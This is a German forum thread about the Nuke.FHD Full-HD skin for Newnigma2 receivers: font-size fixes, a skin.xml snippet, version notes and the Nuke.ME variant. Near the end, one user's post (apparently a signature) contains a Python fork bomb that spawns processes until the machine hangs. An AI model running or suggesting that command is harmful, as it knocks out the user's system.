Nuke.FHD - Full-HD (OE2.5)

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • du musst schon das Image updaten, das update kam gestern Abend.

      es kann natürlich sein, das MST nicht mehr für die Schriftgrösse funktioniert,
      ich nutz es selber nicht.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • @silent, ja klar, da würde auch eine 3000er leitung reichen.


      @alle anderen die den Skin nutzen auf dem aktuellen Unstable,
      mir ist aufgefallen, das nach einem Box reboot oder Gui restart die fonts
      immer noch klein sind, das lässt sich komischerweise beheben, wenn man einmal
      das Mediaportal (wer es installiert hat) startet und beendet, danach sind alle
      schriften "normal" gross für Full-HD
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • Danke, irgend so ein Trottel hatte meinen Beitrag gelöscht wegen dem Mediaportal. Hatte da echt meinem liquid blue skin mp vermisst, persönliche Meinung von mir.
      Ansonsten sehr gelungen dein Werk.
    • hmich schrieb:

      Danke, irgend so ein Trottel hatte meinen Beitrag gelöscht wegen dem Mediaportal. Hatte da echt meinem liquid blue skin mp vermisst, persönliche Meinung von mir.
      Ansonsten sehr gelungen dein Werk.


      den post hab ich gelöscht, da er mit dem thread oder mit dem Nuke Skin nichts zu tun hatte,
      das war ein komplett sinnfreier post. hier gehts nicht um das mediaportal, auch hat nuke keine
      mediaportal sachen skinned.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • Nuke.FHD 5.7.5
      • add: component entries (dmm skin enhancements)
      • add: merlin movie list component entries (removed for Newnigma2 Mod)
      • removed: weather all around (movieselection, channelselection, sib, eventview ...)
      • fixes

      Download im Eingangs Post.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • die schriften sind eigentlich alle optimal gross mit dem aktuellen newnigma2 unstable.

      die "Nuke.ME" ist ja die normale HD version, also keine FullHD, da müsste man dreamer-flt mal
      fragen, ob ich die für Newnigma2 "modden" darf.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • v5.7.5 vom skin installiert ?
      mit scale würd ich nicht arbeiten, sieht nicht mehr gut aus.

      wenn du es dir pers. grösser machen willst, in der skin.xml nach suchen:

      Quellcode

      1. <widget additionalInfoFont="Regular;32" backgroundColor="background" backgroundColorMarked="background" backgroundColorMarkedSelected="background" colorEventProgressbarBorder="foreground" colorEventProgressbarBorderSelected="foreground" colorServiceDescription="fg2" colorServiceDescriptionSelected="foreselect" foregroundColor="channel" foregroundColorMarked="levelmeter" foregroundColorMarkedSelected="light-green" foregroundColorServiceNotAvail="darkevent" name="list" picServiceEventProgressbar="Nuke.FHD/gfx/progress50.png" position="25,105" scrollbarMode="showOnDemand" serviceInfoFont="Regular;32" serviceItemHeight="49" serviceNameFont="Regular;29" serviceNumberFont="Regular;30" size="1150,882" transparent="1" />


      ProgrammInfo: serviceInfoFont="Regular;32"
      Zeilenabstand: serviceItemHeight="49"
      Sendername: serviceNameFont="Regular;29"
      Kanalnummer: serviceNumberFont="Regular;30"

      Kannste dir ja nach deinen Bedürfnissen anpassen
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • Hallo,
      wo finde ich die datei wo ich das ändern kann.

      ProgrammInfo: serviceInfoFont="Regular;32"
      Zeilenabstand: serviceItemHeight="49"
      Sendername: serviceNameFont="Regular;29"
      Kanalnummer: serviceNumberFont="Regular;30"

      Lg
      Stoneii
    • ich denk mal nicht, da aufm DMM feed bestimmt nicht alle abhängigkeiten liegen (hab noch nie ein DMM benutzt ;) )

      ansonsten alle dependencies von unseren feed saugen und bei dirs ins /tmp/ inkl. skin und dann alles installieren.
      oder direkt unser image flashen. ;)


      @gerry6n den "Nuke.ME" hab ich fertig fürs NN² Image, ich warte nur auf Erlaubnis, mal gucken
      was dreamer-flt sagt.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • mal nebenbei gibt es in den nn² screens und bei dmm auch noch sachen da schaudert es einen, aber das wird sicher noch...
      allgemein ist der skin wirklich ein fortschritt für dream-os :D

      was ich meine ist zb der graphische multi epg, nfs editor, nn² webradio
      und es ist mir klar das es noch angepasst werden muss..

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von hmich ()

    • @hmich, die wichtigesten NN2 Screens sind ja skinned, den NN2 Webradio hab ich nicht installiert und brauchen
      tut man ihn ja nicht, wenn man Internetradio Plugin nutzt.

      wie dreamer schon sagte, es gibt einfach viel zu viel mittlerweile was skinned werden könnte.


      Wer den Nuke.ME (normale HD version) sucht, hier gibts ihn:
      Nuke.Me - for Newnigma2
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • Hi !

      Es tut mir leid ich komm mit der Schrift Größe in der TV Liste nicht zurecht und in der Info Anzeige unten.
      kann mir da einer helfen 32 Größe ist mir zu klein am 55" geht’s aber am Mini TFT einfach zu klein von 2,5 m Entfernung habe an 27“ im Schlafzimmer und da ist es einfach zu klein.
      Besten Dank

      Nachtrag!!!!!!

      Habe den Skin Nuke.ME erst heute früh getestet und der ist perfekt für den kleinen TV
      Zwar kein HD aber egal!!! 8)

      LG
      Stoneii

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von stoneii ()

    • erstmal nicht,
      so oft kommen ja keine Updates und wenn siehste es ja an der Versionsnummer im *.deb im 1.Post.
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
    • @deepblue2000
      Bitte mach mal die systeminformationen aus dem skin raus das sollte jetzt ohne skinnen passen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • erledigt :superman:
      Probleme kann man niemals mit derselben Denkweise lösen.

      ¯\_(ツ)_/¯

      "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."